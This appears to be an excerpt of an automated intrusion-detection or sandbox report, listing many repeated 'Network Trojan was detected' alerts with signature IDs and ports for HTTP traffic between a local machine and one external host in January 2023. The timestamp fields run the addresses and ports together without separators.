            Timestamp:192.168.2.3171.22.30.14750067802024318 01/05/23-08:53:59.373237
            SID:2024318
            Source Port:50067
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749733802024313 01/05/23-08:52:20.679095
            SID:2024313
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749851802021641 01/05/23-08:52:56.435777
            SID:2021641
            Source Port:49851
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749969802825766 01/05/23-08:53:31.782144
            SID:2825766
            Source Port:49969
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750000802024313 01/05/23-08:53:39.996140
            SID:2024313
            Source Port:50000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750029802024318 01/05/23-08:53:49.112211
            SID:2024318
            Source Port:50029
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749715802024318 01/05/23-08:52:14.021138
            SID:2024318
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750006802024313 01/05/23-08:53:41.552586
            SID:2024313
            Source Port:50006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749963802825766 01/05/23-08:53:30.141323
            SID:2825766
            Source Port:49963
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749940802825766 01/05/23-08:53:21.893765
            SID:2825766
            Source Port:49940
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750006802024318 01/05/23-08:53:41.552586
            SID:2024318
            Source Port:50006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750029802024313 01/05/23-08:53:49.112211
            SID:2024313
            Source Port:50029
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749874802825766 01/05/23-08:53:02.624496
            SID:2825766
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749761802024318 01/05/23-08:52:28.591148
            SID:2024318
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749922802021641 01/05/23-08:53:17.061545
            SID:2021641
            Source Port:49922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749979802021641 01/05/23-08:53:34.430839
            SID:2021641
            Source Port:49979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749761802024313 01/05/23-08:52:28.591148
            SID:2024313
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749838802024318 01/05/23-08:52:52.824149
            SID:2024318
            Source Port:49838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749743802024313 01/05/23-08:52:23.467755
            SID:2024313
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749743802024318 01/05/23-08:52:23.467755
            SID:2024318
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749838802024313 01/05/23-08:52:52.824149
            SID:2024313
            Source Port:49838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749735802025381 01/05/23-08:52:21.259701
            SID:2025381
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749995802025381 01/05/23-08:53:38.676723
            SID:2025381
            Source Port:49995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749823802021641 01/05/23-08:52:47.379297
            SID:2021641
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749910802025381 01/05/23-08:53:13.740225
            SID:2025381
            Source Port:49910
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497692025483 01/05/23-08:52:30.909539
            SID:2025483
            Source Port:80
            Destination Port:49769
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749771802024318 01/05/23-08:52:31.374001
            SID:2024318
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749864802825766 01/05/23-08:52:59.960618
            SID:2825766
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749771802024313 01/05/23-08:52:31.374001
            SID:2024313
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749969802021641 01/05/23-08:53:31.782144
            SID:2021641
            Source Port:49969
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497472025483 01/05/23-08:52:24.664652
            SID:2025483
            Source Port:80
            Destination Port:49747
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750002802025381 01/05/23-08:53:40.505314
            SID:2025381
            Source Port:50002
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749889802024313 01/05/23-08:53:06.674333
            SID:2024313
            Source Port:49889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497362025483 01/05/23-08:52:21.623629
            SID:2025483
            Source Port:80
            Destination Port:49736
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749967802025381 01/05/23-08:53:31.230819
            SID:2025381
            Source Port:49967
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749889802024318 01/05/23-08:53:06.674333
            SID:2024318
            Source Port:49889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749836802825766 01/05/23-08:52:51.681664
            SID:2825766
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749707802025381 01/05/23-08:52:10.342729
            SID:2025381
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749937802024318 01/05/23-08:53:21.090422
            SID:2024318
            Source Port:49937
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497252025483 01/05/23-08:52:18.471891
            SID:2025483
            Source Port:80
            Destination Port:49725
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749890802025381 01/05/23-08:53:06.934564
            SID:2025381
            Source Port:49890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749699802825766 01/05/23-08:52:06.870270
            SID:2825766
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749991802825766 01/05/23-08:53:37.629731
            SID:2825766
            Source Port:49991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750057802024318 01/05/23-08:53:56.743180
            SID:2024318
            Source Port:50057
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750059802025381 01/05/23-08:53:57.279795
            SID:2025381
            Source Port:50059
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750030802025381 01/05/23-08:53:49.383588
            SID:2025381
            Source Port:50030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749705802024313 01/05/23-08:52:09.363911
            SID:2024313
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749879802021641 01/05/23-08:53:03.965987
            SID:2021641
            Source Port:49879
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749919802024313 01/05/23-08:53:16.188265
            SID:2024313
            Source Port:49919
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749950802024318 01/05/23-08:53:24.624259
            SID:2024318
            Source Port:49950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750050802825766 01/05/23-08:53:54.799294
            SID:2825766
            Source Port:50050
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749807802025381 01/05/23-08:52:43.044779
            SID:2025381
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749817802825766 01/05/23-08:52:45.747633
            SID:2825766
            Source Port:49817
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749773802025381 01/05/23-08:52:31.909319
            SID:2025381
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498172025483 01/05/23-08:52:45.827002
            SID:2025483
            Source Port:80
            Destination Port:49817
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749824802024313 01/05/23-08:52:47.639113
            SID:2024313
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749950802024313 01/05/23-08:53:24.624259
            SID:2024313
            Source Port:49950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749722802825766 01/05/23-08:52:17.506386
            SID:2825766
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749919802024318 01/05/23-08:53:16.188265
            SID:2024318
            Source Port:49919
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499422025483 01/05/23-08:53:22.531244
            SID:2025483
            Source Port:80
            Destination Port:49942
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750076802021641 01/05/23-08:54:01.789357
            SID:2021641
            Source Port:50076
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749751802021641 01/05/23-08:52:25.762510
            SID:2021641
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749905802025381 01/05/23-08:53:12.409052
            SID:2025381
            Source Port:49905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749755802825766 01/05/23-08:52:26.961334
            SID:2825766
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749712802025381 01/05/23-08:52:12.436257
            SID:2025381
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497552025483 01/05/23-08:52:27.042461
            SID:2025483
            Source Port:80
            Destination Port:49755
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749810802025381 01/05/23-08:52:43.863274
            SID:2025381
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499012025483 01/05/23-08:53:11.433874
            SID:2025483
            Source Port:80
            Destination Port:49901
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749975802024318 01/05/23-08:53:33.363507
            SID:2024318
            Source Port:49975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750023802021641 01/05/23-08:53:47.546596
            SID:2021641
            Source Port:50023
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749880802024313 01/05/23-08:53:04.232334
            SID:2024313
            Source Port:49880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749762802024313 01/05/23-08:52:28.868227
            SID:2024313
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749880802024318 01/05/23-08:53:04.232334
            SID:2024318
            Source Port:49880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749975802024313 01/05/23-08:53:33.363507
            SID:2024313
            Source Port:49975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749863802025381 01/05/23-08:52:59.703117
            SID:2025381
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749762802024318 01/05/23-08:52:28.868227
            SID:2024318
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749958802025381 01/05/23-08:53:27.233105
            SID:2025381
            Source Port:49958
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750043802021641 01/05/23-08:53:52.949985
            SID:2021641
            Source Port:50043
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749900802025381 01/05/23-08:53:10.997847
            SID:2025381
            Source Port:49900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749748802021641 01/05/23-08:52:24.879047
            SID:2021641
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749994802025381 01/05/23-08:53:38.408241
            SID:2025381
            Source Port:49994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750019802825766 01/05/23-08:53:45.311637
            SID:2825766
            Source Port:50019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497962025483 01/05/23-08:52:40.072266
            SID:2025483
            Source Port:80
            Destination Port:49796
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497922025483 01/05/23-08:52:38.965247
            SID:2025483
            Source Port:80
            Destination Port:49792
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749784802021641 01/05/23-08:52:36.673037
            SID:2021641
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749927802024313 01/05/23-08:53:18.426652
            SID:2024313
            Source Port:49927
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750001802024313 01/05/23-08:53:40.243949
            SID:2024313
            Source Port:50001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749927802024318 01/05/23-08:53:18.426652
            SID:2024318
            Source Port:49927
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749781802025381 01/05/23-08:52:35.821668
            SID:2025381
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750055802825766 01/05/23-08:53:56.183544
            SID:2825766
            Source Port:50055
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498062025483 01/05/23-08:52:42.859984
            SID:2025483
            Source Port:80
            Destination Port:49806
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749925802025381 01/05/23-08:53:17.874226
            SID:2025381
            Source Port:49925
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749841802021641 01/05/23-08:52:53.743125
            SID:2021641
            Source Port:49841
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750001802024318 01/05/23-08:53:40.243949
            SID:2024318
            Source Port:50001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749837802825766 01/05/23-08:52:51.988001
            SID:2825766
            Source Port:49837
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749717802025381 01/05/23-08:52:14.673219
            SID:2025381
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749935802825766 01/05/23-08:53:20.565175
            SID:2825766
            Source Port:49935
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749988802024318 01/05/23-08:53:36.817903
            SID:2024318
            Source Port:49988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750045802025381 01/05/23-08:53:53.481872
            SID:2025381
            Source Port:50045
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750081802025381 01/05/23-08:54:03.233046
            SID:2025381
            Source Port:50081
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750034802024313 01/05/23-08:53:50.478539
            SID:2024313
            Source Port:50034
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749970802024318 01/05/23-08:53:32.043326
            SID:2024318
            Source Port:49970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750020802025381 01/05/23-08:53:45.631791
            SID:2025381
            Source Port:50020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749771802021641 01/05/23-08:52:31.374001
            SID:2021641
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749706802024313 01/05/23-08:52:09.771973
            SID:2024313
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749804802024313 01/05/23-08:52:42.167879
            SID:2024313
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749873802825766 01/05/23-08:53:02.352866
            SID:2825766
            Source Port:49873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499122025483 01/05/23-08:53:14.416891
            SID:2025483
            Source Port:80
            Destination Port:49912
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749914802024313 01/05/23-08:53:14.852027
            SID:2024313
            Source Port:49914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749970802024313 01/05/23-08:53:32.043326
            SID:2024313
            Source Port:49970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750012802025381 01/05/23-08:53:43.190304
            SID:2025381
            Source Port:50012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749938802025381 01/05/23-08:53:21.374225
            SID:2025381
            Source Port:49938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749914802024318 01/05/23-08:53:14.852027
            SID:2024318
            Source Port:49914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749961802025381 01/05/23-08:53:29.597138
            SID:2025381
            Source Port:49961
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749706802024318 01/05/23-08:52:09.771973
            SID:2024318
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749739802024313 01/05/23-08:52:22.339123
            SID:2024313
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750034802024318 01/05/23-08:53:50.478539
            SID:2024318
            Source Port:50034
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749846802021641 01/05/23-08:52:55.097334
            SID:2021641
            Source Port:49846
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749896802025381 01/05/23-08:53:08.759564
            SID:2025381
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749983802024318 01/05/23-08:53:35.478290
            SID:2024318
            Source Port:49983
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749988802024313 01/05/23-08:53:36.817903
            SID:2024313
            Source Port:49988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749725802025381 01/05/23-08:52:18.390674
            SID:2025381
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749983802024313 01/05/23-08:53:35.478290
            SID:2024313
            Source Port:49983
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749965802021641 01/05/23-08:53:30.671447
            SID:2021641
            Source Port:49965
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750039802024318 01/05/23-08:53:51.865723
            SID:2024318
            Source Port:50039
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750025802025381 01/05/23-08:53:48.086655
            SID:2025381
            Source Port:50025
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499642025483 01/05/23-08:53:30.482276
            SID:2025483
            Source Port:80
            Destination Port:49964
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750033802024318 01/05/23-08:53:50.199257
            SID:2024318
            Source Port:50033
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750039802024313 01/05/23-08:53:51.865723
            SID:2024313
            Source Port:50039
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749936802825766 01/05/23-08:53:20.832811
            SID:2825766
            Source Port:49936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749738802024313 01/05/23-08:52:22.066688
            SID:2024313
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749841802825766 01/05/23-08:52:53.743125
            SID:2825766
            Source Port:49841
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749932802021641 01/05/23-08:53:19.762349
            SID:2021641
            Source Port:49932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750016802025381 01/05/23-08:53:44.267939
            SID:2025381
            Source Port:50016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750070802024318 01/05/23-08:54:00.166694
            SID:2024318
            Source Port:50070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749739802024318 01/05/23-08:52:22.339123
            SID:2024318
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749837802024318 01/05/23-08:52:51.988001
            SID:2024318
            Source Port:49837
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749930802825766 01/05/23-08:53:19.220224
            SID:2825766
            Source Port:49930
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750070802024313 01/05/23-08:54:00.166694
            SID:2024313
            Source Port:50070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749981802025381 01/05/23-08:53:34.961120
            SID:2025381
            Source Port:49981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499202025483 01/05/23-08:53:16.592848
            SID:2025483
            Source Port:80
            Destination Port:49920
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499232025483 01/05/23-08:53:17.413136
            SID:2025483
            Source Port:80
            Destination Port:49923
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750014802024313 01/05/23-08:53:43.719267
            SID:2024313
            Source Port:50014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497702025483 01/05/23-08:52:31.194343
            SID:2025483
            Source Port:80
            Destination Port:49770
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749992802825766 01/05/23-08:53:37.885447
            SID:2825766
            Source Port:49992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750014802024318 01/05/23-08:53:43.719267
            SID:2024318
            Source Port:50014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749837802024313 01/05/23-08:52:51.988001
            SID:2024313
            Source Port:49837
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749738802024318 01/05/23-08:52:22.066688
            SID:2024318
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500752025483 01/05/23-08:54:01.598104
            SID:2025483
            Source Port:80
            Destination Port:50075
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497812025483 01/05/23-08:52:35.903217
            SID:2025483
            Source Port:80
            Destination Port:49781
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749719802024318 01/05/23-08:52:15.841614
            SID:2024318
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497022025483 01/05/23-08:52:08.238277
            SID:2025483
            Source Port:80
            Destination Port:49702
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749719802024313 01/05/23-08:52:15.841614
            SID:2024313
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749992802021641 01/05/23-08:53:37.885447
            SID:2021641
            Source Port:49992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749840802825766 01/05/23-08:52:53.465268
            SID:2825766
            Source Port:49840
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749936802021641 01/05/23-08:53:20.832811
            SID:2021641
            Source Port:49936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499752025483 01/05/23-08:53:33.447961
            SID:2025483
            Source Port:80
            Destination Port:49975
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749751802825766 01/05/23-08:52:25.762510
            SID:2825766
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
